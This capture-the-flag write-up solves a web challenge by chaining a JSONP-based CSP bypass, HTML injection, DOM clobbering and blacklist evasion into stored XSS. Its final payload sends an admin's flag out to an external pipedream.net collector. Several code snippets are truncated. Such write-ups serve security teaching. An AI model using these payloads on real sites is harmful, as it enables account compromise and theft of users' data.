Xmas Shopping Site - localo

Category: Web
Difficulty: Hard
Author: Staubfinger


I made an Xmas Shop! If you run into any problems, just submit a link on the submit page - and i will check it for you.

Check it out at: http://xss.allesctf.net/


On xss.allesctf.net is website.
With two stages...


On the second stage is the flag on the website. To get the real flag we have to find a XSS vulnerability and attack the admin. To do this there is a Submit page in the first stage.

Here we can submit a URL and the admin will visit it.


Let's try to XSS ourself first.
The website has a search filed at the top right, those are often vulnerable to simple XSS attacks:

In the Inspector we can see that the input is reflected and try to inject simple script:

The script element is reflected inside the website, but there is no popup. The console tells us why:


The Content Security Policy is a header that tells the browser which content is allowed. There are many rules and the CSP evaluator link can be used to parse them.
Here is the header from the response:

Content-Security-Policy: default-src 'self' http://*.xss.allesctf.net; object-src 'none'; base-uri 'none';

And the output of the evaluator:

Only scripts from http://*.xss.allesctf.net and self are allowed.

If we take a look at the network traffic we can see a GET request to http://xss.allesctf.net/items.php?cb=parseItems

As the parameter name already hints cb is a callback. And the response is a js script:

parseItems([{"title": "Weihnachtsbaum", "url": "3.png", "text": "Plastik und voll schön."},{"title": "Christbaumkugel", "url": "1.png", "text": "Rund und bunt."},{"title": "Schlitten", "url": "2.png", "text": "Es ist glatt, er ist schnell!"}])

The format is called JSONP it is basically JSON wrapped by a callback so that when loaded as a <script> it will execute the defined callback. JSONP on Wikipedia
If we change the cb parameter value we can observer that our input is reflected into the response.

The CSP evaluator mentioned that we should make sure that no JSONP is hosted.

We can use the first injection to load a script from xss.allesctf.net/items.php?cb=... and set cb to some code, here is the URL for alert:
this results in the response:

alert();//([{"title": "Weihnachtsbaum", "url": "3.png", "text": "Plastik und voll schön."},{"title": "Christbaumkugel", "url": "1.png", "text": "Rund und bunt."},{"title": "Schlitten", "url": "2.png", "text": "Es ist glatt, er ist schnell!"}])

The // comments out everything after our callback name, therefore we can execute what we want.
Visiting http://xss.allesctf.net/?search=<script+src='http://xss.allesctf.net/items.php?cb=alert();//'></script> pops an alert 😄

So we can now simply get that flag, right?
The flag is on the page of stage2, but we need the right to access it.

Otherwise the access is denied..

Fortunately the token is inside the code of stage1


  1. use the xss on stage1 to get the token
  2. use fetch to get the content of stage2 and grab the flag
  3. submit the flag

The items.php has some kind of blacklist some strings are replaced with FORBIDDEN_CHAR like: < and > or eval. But most stuff is allowed and the restriction won't cause much problems. There is another restriction a maximum of 250 chars for cb. But we can load multiple scripts in the first place and I wrote a simple python script that creates a URL for me.

import requests

s = requests.Session()

def quote(s):
    return s.replace("=","%3d").replace(" ","+").replace("\n",";")

def exec_js(js):
    url = "http://xss.allesctf.net/?search="
    for j in js:
        url+="%%3Cscript%%20src='http://xss.allesctf.net/items.php?cb=%s//'%%3E%%3C/script%%3E" %(quote(j))
    return url


The output (URL decoded):

http://xss.allesctf.net/?search=<script src='http://xss.allesctf.net/items.php?cb=alert(1)//'></script><script src='http://xss.allesctf.net/items.php?cb=alert(2)//'></script>

And when we visit that we get two alerts.
And here is the fetch:

function cb1(r){

But it fails because of CORS
There is not Access-Control-Allow-Origin header. It won't be that easy 😦
We could redirect the user to the site, but the we loose control and can't exfiltrate the flag.

After some trial and error I decided to look a bit into stage2. It has a comment:

What is CORS? Baby don't hurt me, don't hurt me - no more! 

This told me that I was on the right track.
In stage2 we can change the background:

This is preserved on reloads and therefore saved on the server in the session.
The clients send a POST request to the server with the content:
bg=red, bg=green or bg=tree and the server puts the value into a input field in the following responses:

<!-- set bg color -->
<input type="hidden" id="bg" value="tree">

This is the parsed by background.js which is loaded by the page

$(document).ready(() => {

$(document).ready(() => {

const changeBackground = (e) => {
    fetch(window.location.href, {
        headers: {'Content-type': 'application/x-www-form-urlencoded'},
        method: "POST",
        credentials: "include",
        body: 'bg=' + $(e.target).val() 
    }).then(() => location.reload())


The backgrounds variable is created inside a script element in the page of stage2

<script nonce="NcC/JCZ+axyPTQeyv0XZs1YsMEk=">
    var backgrounds = {
        'red': [
            '<img class="bg-img" src="/static/img/red.png"></img>'
         'green': [
             '<img class="bg-img" src="/static/img/green.png"></img>'
          'tree': [
              '<img class="bg-img" src="/static/img/tree.png"></img>'

Let's try to do another injection:
I used the edit and resend feature of firefox and changed bg to something that escapes the value parameter and removed the Content-Length header to force firefox to create a new one.

After a reload:

<!-- set bg color -->
<input type="hidden" id="bg" value="A"BBBB">

The injection worked without a problem.

New Plan:

  1. use the xss on stage1 to get the token
  2. use fetch with POST to set the background to inject a script element
  3. exfiltrate the flag

But can we use script tags in stage2?!
Here is the CSP:

Content-Security-Policy: script-src 'nonce-6BGntpS3POL60qMZ9bj1X47CzA0=' 'unsafe-inline' 'strict-dynamic'; base-uri 'none'; object-src 'none';

And the output of CSP evaluator:

It says it is safe.
We can't use the JSONP trick, because we need the nonce.

background.js writes our content into the page:

$(document).ready(() => {

The function indexes backgrounds with our value and appends the result to the body. We can use DOM clobbering to let the script append controlled content. We just have to corrupt the script element that creates the backgrounds variable and create a tag with attribute id=backgrounds.

here the data of the POST request

bg="><a id=backgrounds><!--

And after a reload:

> console.log(backgrounds)
accessKey: ""[...]

And since we can chose the name of the index we can even reflect the Flag back again.

> console.log(backgrounds["innerText"])

bg=innerText" ><a id=backgrounds><!--

This does not help us, since we are back at the same problem where we started, how can we exfiltrate it?

This problem took me longer than the rest of the challenge.
It turns out that CSP does not apply to <script> tags if they are put into the DOM by a trusted script.
And backgrounds.js is a trusted script.
Therefore <script>alert()</script> just works if background.js writes it to the document. We can use the name attribute and write our payload into that and use name as the index.

bg=name" ><a id=backgrounds name="<script>alert()</script>"><!--

And we get our beloved popup:

Well, we now have to bypass the backlist in stage1 this can be done by using something like String.fromCharCode(60)[0], chain everything together and add a simple exfiltrate script.
The final script looks like this:

c = String.fromCharCode(60,62,39)
l=`name" ><a id=backgrounds name="<script>$.get('https://[exfiltrate_website]/'.concat($('.col-8 > b')[0].textContent))"></a><!--`
p = {
t = document.getElementById("stage2").href
fetch(t, p).then(k).catch(k)

I reverted the replace of the special chars, but < would be replaced by ${c[0]}, > by ${c[1]} and ' by ${c[2]}

We can now generate the full URL:


Submit that and get the flag:


import requests

s = requests.Session()

def quote(s):
    return s.replace("=","%3d").replace(" ","+").replace("\n",";")

def exec_js(js):
    url = "http://xss.allesctf.net/?search="
    for j in js:
        url+="%%3Cscript%%20src='http://xss.allesctf.net/items.php?cb=%s//'%%3E%%3C/script%%3E" %(quote(j))
    return url

var c=String.fromCharCode(60,62,39)""",
l=`name" ${c[1]}${c[0]}a id=backgrounds name=${c[2]}${c[0]}script${c[1]}$.get("https://enm1wlnbn5g4.x.pipedream.net/".concat($(".col-8 ${c[1]} b")[0].textContent))${c[2]}${c[1]}${c[0]}/a${c[1]}${c[0]}!--`
p = {headers:{"Content-type":"application/x-www-form-urlencoded"},method:"POST",credentials:"include",body:`bg=${l}`}
t = document.getElementById("stage2").href
fetch(t, p).then(k).catch(k)


